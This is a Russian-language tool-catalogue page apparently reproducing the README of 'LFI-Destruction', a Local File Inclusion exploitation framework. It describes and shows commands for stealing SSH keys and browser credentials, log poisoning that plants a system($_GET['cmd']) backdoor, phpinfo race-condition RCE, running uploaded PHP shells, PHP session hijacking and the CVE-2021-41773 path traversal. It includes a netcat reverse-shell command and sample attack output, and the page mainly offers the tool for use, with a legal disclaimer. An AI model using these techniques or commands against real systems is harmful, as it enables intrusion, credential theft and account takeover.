Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
LFI-Destruction — Эта программа запрашивает информацию о локальном включении файла (Local File Inclusion) и автоматически ищет /etc/passwd, а затем, используя найденные имена пользователей, ищет и загружает любые SSH-ключи или их вариации на локальный компьютер. Эта программа также выполняет эксплойт обхода пути CVE-2021-41773_ для Apache 2.4.49 и 50. В дополнение к другим уязвимостям LFI. | Kitploit
Инструменты/GitHubGitHub/revshellxd/lfi-destruction
Повышение привилегийРазведкаАтаки на ПаролиГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииCTF

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Эта программа запрашивает информацию о локальном включении файла (Local File Inclusion) и автоматически ищет /etc/passwd, а затем, используя найденные имена пользователей, ищет и загружает любые SSH-ключи или их вариации на локальный компьютер. Эта программа также выполняет эксплойт обхода пути CVE-2021-41773_ для Apache 2.4.49 и 50. В дополнение к другим уязвимостям LFI.

Тестирование на Проникновение
Обучение и Образование
GitHubrevshellxd/lfi-destruction

LFI-Destruction

Репозиторий
426 месяцев назадЕщё не проверено
Поделиться

🔥 LFI-Destruction – Фреймворк авторизованного тестирования на проникновение LFI-Destroyer — это комплексный модульный фреймворк эксплуатации Local File Inclusion (LFI), разработанный для авторизованных специалистов по безопасности. Он объединяет множество атакующих техник в единый простой в использовании инструмент:

  • Фаззинг артефактов SSH и браузеров – поиск ключей SSH, файлов Putty PPK, WinSCP, FileZilla, Firefox, Chrome, Edge и Brave в Linux и Windows.
  • Отравление журналов → Обратная оболочка – Автоматическое RCE через доступные для записи файлы журналов с поддержкой пользовательских полезных нагрузок.
  • phpinfo() Race Condition RCE – Полностью автоматизированное LFI2RCE, когда file_uploads=On и phpinfo() доступна.
  • Триггер загруженного файла – включение и выполнение уже загруженной PHP-оболочки через LFI.
  • Перечисление PHP-сессий – загрузка и декодирование файлов сессий для перехвата.

LFI-OSCP.py

Это безопасная версия для экзамена OSCP, в которой нет автоматических эксплойтов. Это, по сути, очень красивый фаззер, который после подтверждения уязвимости выводит ручные инструкции по выполнению эксплойта.

⚠️ ЮРИДИЧЕСКОЕ ПРЕДУПРЕЖДЕНИЕ

Этот инструмент предназначен только для образовательных целей и авторизованного тестирования безопасности.
Вы должны иметь явное письменное разрешение владельца системы перед использованием.
Несанкционированный доступ к компьютерным системам незаконен и неэтичен.
Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.

📦 Установка

root@kitploit:~
# 1. Clone the repository
git clone https://github.com/RevShellXD/LFI-Destroyer.git
cd LFI-Destroyer

# 2. Install dependencies (only colorama is required; others are optional)
pip install colorama

# 3. Make the main script executable
chmod +x LFI-Destroyer.py

🚀 Быстрый старт – Режим 1 (Фаззинг артефактов SSH / браузеров)

root@kitploit:~
python3 LFI-Destroyer.py

Выберите Linux или Windows.

📂 Структура каталогов

LFI-Destruction/ LFI-Destruction.py

modes/init.py ,mode3_phpinfo_race.py, mode4_upload_trigger.py, mode5_session_grabber.py

artifacts/

README.md

Выберите режим атаки 1.

Следуйте подсказкам для настройки LFI-точки входа.

Скрипт автоматически перечисляет пользователей, проверяет их существование (в Windows используется маяк NTUSER.DAT) и рекурсивно фаззит ключи SSH, учетные данные браузеров и другие конфиденциальные файлы.

Все артефакты сохраняются в каталог ./artifacts/.

📝 Режим 2 – Отравление журналов и обратная оболочка

root@kitploit:~
python3 LFI-Destroyer.py --log-poisoning --log-vector ua

Или запустите в интерактивном режиме и выберите режим 2.

Что происходит:

  • Внедряет тестовую PHP-нагрузку через User‑Agent (или выбранный вами вектор).
  • Пытается включить общие файлы журналов (Apache, Nginx, SSH, системные журналы, XAMPP/WAMP/IIS в Windows).
  • Если найден доступный для записи журнал, внедряет постоянный бэкдор system($_GET['cmd']).
  • Подтверждает RCE с помощью id (Linux) или whoami (Windows).
  • Запрашивает прослушиватель обратной оболочки и доставляет обратную оболочку bash (Linux) или PowerShell (Windows).

Пользовательская обратная оболочка:

root@kitploit:~
python3 LFI-Destroyer.py --log-poisoning --log-vector ua --custom-shell "nc {lhost} {lport} -e /bin/bash"

Плейсхолдеры {lhost} и {lport} будут заменены на IP/порт вашего прослушивателя.

🧪 BETA – Режим 3: phpinfo() Race Condition RCE

Статус: Beta – надежно работает на неправильно настроенных PHP-серверах с file_uploads=On и доступной phpinfo().

Предварительные требования:

  • file_uploads = On (определяется автоматически)
  • post_max_size ≥ upload_max_filesize (определяется автоматически)
  • Уязвимость LFI
  • Доступ к странице phpinfo() (скрипт перебирает типовые расположения)

Запуск:

root@kitploit:~
python3 LFI-Destroyer.py
# Выберите режим 3

Укажите детали LFI как обычно. Скрипт будет:

  • Перебирать phpinfo() (словник, зависящий от ОС)
  • Анализировать upload_max_filesize и post_max_size
  • Выполнять атаку с гонкой (загрузка + LFI)
  • Подтверждать RCE
  • Предлагать обратную оболочку

Пример вывода:

root@kitploit:~
[*] Bruteforcing phpinfo.php (45 paths) ...
[+] Found phpinfo.php at http://192.168.1.100/phpinfo.php
[+] file_uploads=On (max size: 8M)
[+] Attempt race condition RCE? (y/N): y
[*] Race attempt 1/3 ...
[+] Extracted temporary file path: /tmp/phpABC123
[+] RCE confirmed via temporary file!
[!] LOG POISONING SUCCESSFUL! Ready to escalate to reverse shell.

🧪 BETA – Режим 4: Триггер загруженного файла

Статус: Beta – предполагается, что вы уже загрузили PHP-оболочку (например, через другую уязвимость или вручную). Скрипт затем использует LFI для её включения и выполнения команд.

Два режима работы:

  • Точный путь – вы знаете, где находится файл (например, uploads/shell.php).
  • Перебор – скрипт пробует типовые каталоги загрузки + имена файлов.

Запуск:

root@kitploit:~
python3 LFI-Destroyer.py
# Выберите режим 4

Введите путь или 'brute'. Скрипт будет:

  • Пытаться включить LFI с ?cmd=whoami
  • В случае успеха покажет вывод и предложит обратную оболочку

Пример:

root@kitploit:~
Enter path to uploaded file (relative to web root), or 'brute' to try common locations: uploads/shell.php
[*] Trying uploads/shell.php ...
[+] SUCCESS! Shell executed at uploads/shell.php
[+] Command output:
www-data
Attempt reverse shell? (y/N): y

🧪 BETA – Режим 5: Перечисление и перехват PHP-сессий

Статус: Beta – читает файлы сессий из session.save_path (определяется через phpinfo() или резервный словник), сохраняет их и при необходимости пытается декодировать base64.

Запуск:

root@kitploit:~
python3 LFI-Destroyer.py
# Выберите режим 5

Введите ID сессии или 'list' для перечисления.

Примеры:

root@kitploit:~
Enter session ID to retrieve (PHPSESSID), or 'list' to enumerate: abc123
[*] Reading /var/lib/php/sessions/sess_abc123 ...
[+] Session file retrieved!
[--- SESSION DATA (raw) ---]
username|s:5:"admin";user_id|i:1;

Листинг каталога сессий (если включена индексация каталога):

root@kitploit:~
Enter session ID to retrieve (PHPSESSID), or 'list' to enumerate: list
[+] Found 12 session files:
  - sess_abc123
  - sess_def456
  ...

Все файлы сессий сохраняются в artifacts/session_*.
Если данные выглядят как base64-кодированные, скрипт автоматически пытается выполнить обход через php://filter/convert.base64-decode и сохраняет декодированную версию.

🧠 Расширенный режим (-adv)

Включает дополнительные LFI-техники:

  • LFI через POST-параметры
  • LFI через Cookie/Заголовки
  • PHP-обёртки (php://filter, data://, expect://)
  • Пользовательский словник для фаззинга артефактов
  • Автоматическое определение глубины обхода
root@kitploit:~
python3 LFI-Destroyer.py -adv

⚙️ Флаги командной строки

Flag Description --os {linux,windows} Принудительно указать ОС цели --auto-depth Автоматически определять глубину обхода --wordlist FILE Пользовательский список путей к файлам (заменяет стандартный для ОС) --userlist FILE Пользовательские имена пользователей Windows (режим 1) --beacon-file PATH Пользовательский файл маяка (по умолчанию: NTUSER.DAT) --custom-shell CMD Пользовательская команда обратной оболочки (используйте {lhost} и {lport}) --log-poisoning Включить режим 2 из командной строки (без интерактивного выбора) --log-vector {ua,referer,xff,header,param} Вектор внедрения для отравления журналов --log-header NAME Пользовательское имя заголовка (для vector=header) --log-param NAME Пользовательское имя параметра (для vector=param) --log-files FILE Пользовательский список путей к журналам --rce-command CMD Тестовая команда для проверки RCE --proxy URL HTTP-прокси (например, http://127.0.0.1:8080) --rate FLOAT Задержка между запросами (секунды) --output FILE Сохранить результаты в JSON --dry-run Тестовая конфигурация – запросы не отправляются --no-color Отключить цветной вывод

🧪 Режимы 3, 4 и 5 загружаются динамически из каталога modes/.

Вы можете легко добавлять новые режимы, поместив Python-файл с функцией run(config, fuzzer).

🧰 Требования

  • Python 3.8+
  • colorama (опционально, для цветного вывода)
  • Других зависимостей нет – скрипт использует только стандартную библиотеку.

📜 Лицензия и автор

Автор: RevShellXD
Распространяется под лицензией MIT – бесплатно для авторизованных специалистов по безопасности.

Только для образовательных целей и авторизованного тестирования.
Если вы нарушите закон с помощью этого инструмента, вы несёте полную ответственность.

⭐ Звезда и вклад

Если вы считаете этот инструмент полезным, поставьте звезду репозиторию на GitHub.
Приветствуются pull request'ы и новые режимы – следуйте простому интерфейсу модуля в modes/__init__.py.

Скачать инструмент